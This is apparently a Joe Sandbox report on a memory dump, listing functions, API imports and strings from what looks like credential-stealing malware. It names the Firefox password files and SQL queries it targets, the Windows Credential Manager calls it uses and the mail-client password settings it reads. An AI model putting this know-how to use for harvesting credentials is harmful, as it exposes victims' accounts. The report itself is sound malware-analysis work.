                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$QueryValuememset
                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                  • API String ID: 168965057-606283353
                  • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                  • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                  • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                  • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                  Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                  • LoadCursorA.USER32(00000067), ref: 0040115F
                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                  • EndDialog.USER32(?,00000001), ref: 0040121A
                  • DeleteObject.GDI32(?), ref: 00401226
                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                  • ShowWindow.USER32(00000000), ref: 00401253
                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                  • ShowWindow.USER32(00000000), ref: 00401262
                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                  • memset.MSVCRT ref: 0040128E
                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                  • String ID:
                  • API String ID: 2998058495-0
                  • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                  • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                  Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                  • API String ID: 231171946-2189169393
                  • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                  • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                  • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                  • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                  Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$memsetsprintf$_mbscpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  • API String ID: 633282248-1996832678
                  • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                  • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                  • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                  • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                  Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                  • , xrefs: 00406834
                  • key4.db, xrefs: 00406756
                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp$memsetstrlen
                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                  • API String ID: 3614188050-3983245814
                  • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                  • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                  • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                  • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                  Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: sprintf$memset$_mbscpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  • API String ID: 3402215030-3842416460
                  • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                  • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                  • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                  • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                  Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                    • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                    • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                  • strlen.MSVCRT ref: 0040F139
                  • strlen.MSVCRT ref: 0040F147
                  • memset.MSVCRT ref: 0040F187
                  • strlen.MSVCRT ref: 0040F196
                  • strlen.MSVCRT ref: 0040F1A4
                  • memset.MSVCRT ref: 0040F1EA
                  • strlen.MSVCRT ref: 0040F1F9
                  • strlen.MSVCRT ref: 0040F207
                  • _strcmpi.MSVCRT ref: 0040F2B2
                  • _mbscpy.MSVCRT ref: 0040F2CD
                  • _mbscpy.MSVCRT ref: 0040F30E
                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                  • String ID: logins.json$none$signons.sqlite$signons.txt
                  • API String ID: 1613542760-3138536805
                  • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                  • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                  Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                  • API String ID: 1012775001-1343505058
                  • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                  • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                  • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                  • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                  Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00444612
                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                  • strlen.MSVCRT ref: 0044462E
                  • memset.MSVCRT ref: 00444668
                  • memset.MSVCRT ref: 0044467C
                  • memset.MSVCRT ref: 00444690
                  • memset.MSVCRT ref: 004446B6
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                    • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                  • memcpy.MSVCRT ref: 004446ED
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                  • memcpy.MSVCRT ref: 00444729
                  • memcpy.MSVCRT ref: 0044473B
                  • _mbscpy.MSVCRT ref: 00444812
                  • memcpy.MSVCRT ref: 00444843
                  • memcpy.MSVCRT ref: 00444855
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset$strlen$_mbscpy
                  • String ID: salu
                  • API String ID: 3691931180-4177317985
                  • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                  • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                  • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                  • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                  Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                  • API String ID: 2449869053-232097475
                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                  Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                  Download Yara Rule
                  APIs
                  • sprintf.MSVCRT ref: 0040957B
                  • LoadMenuA.USER32(?,?), ref: 00409589
                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                  • DestroyMenu.USER32(00000000), ref: 004095A7
                  • sprintf.MSVCRT ref: 004095EB
                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                  • memset.MSVCRT ref: 0040961C
                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                  • DestroyWindow.USER32(00000000), ref: 0040965C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                  • String ID: caption$dialog_%d$menu_%d
                  • API String ID: 3259144588-3822380221
                  • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                  • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                  • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                  • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                  Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                  • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                  • API String ID: 2449869053-4258758744
                  • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                  • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                  • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                  • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                  Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                  Download Yara Rule
                  APIs
                  • wcsstr.MSVCRT ref: 0040426A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                  • _mbscpy.MSVCRT ref: 004042D5
                  • _mbscpy.MSVCRT ref: 004042E8
                  • strchr.MSVCRT ref: 004042F6
                  • strlen.MSVCRT ref: 0040430A
                  • sprintf.MSVCRT ref: 0040432B
                  • strchr.MSVCRT ref: 0040433C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                  • String ID: %s@gmail.com$www.google.com
                  • API String ID: 3866421160-4070641962
                  • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                  • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                  • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                  • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                  Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                  • API String ID: 2360744853-2229823034
                  • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                  • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                  • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                  • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                  Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                  Download Yara Rule
                  APIs
                  • strchr.MSVCRT ref: 004100E4
                  • _mbscpy.MSVCRT ref: 004100F2
                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                  • _mbscpy.MSVCRT ref: 00410142
                  • _mbscat.MSVCRT ref: 0041014D
                  • memset.MSVCRT ref: 00410129
                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                    • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                  • memset.MSVCRT ref: 00410171
                  • memcpy.MSVCRT ref: 0041018C
                  • _mbscat.MSVCRT ref: 00410197
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                  • String ID: \systemroot
                  • API String ID: 912701516-1821301763
                  • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                  • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                  Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$strlen
                  • String ID: -journal$-wal$immutable$nolock
                  • API String ID: 2619041689-3408036318
                  • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                  • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                  • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                  • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                  Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                  • wcslen.MSVCRT ref: 0040874A
                  • _wcsncoll.MSVCRT ref: 00408794
                  • memset.MSVCRT ref: 0040882A
                  • memcpy.MSVCRT ref: 00408849
                  • wcschr.MSVCRT ref: 0040889F
                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                  • String ID: J$Microsoft_WinInet
                  • API String ID: 2203907242-260894208
                  • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                  • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                  • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                  • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                  Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  • _mbscpy.MSVCRT ref: 00409686
                  • _mbscpy.MSVCRT ref: 00409696
                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 888011440-2039793938
                  • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                  • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                  Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                  • strchr.MSVCRT ref: 0040327B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringstrchr
                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                  • API String ID: 1348940319-1729847305
                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                  Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
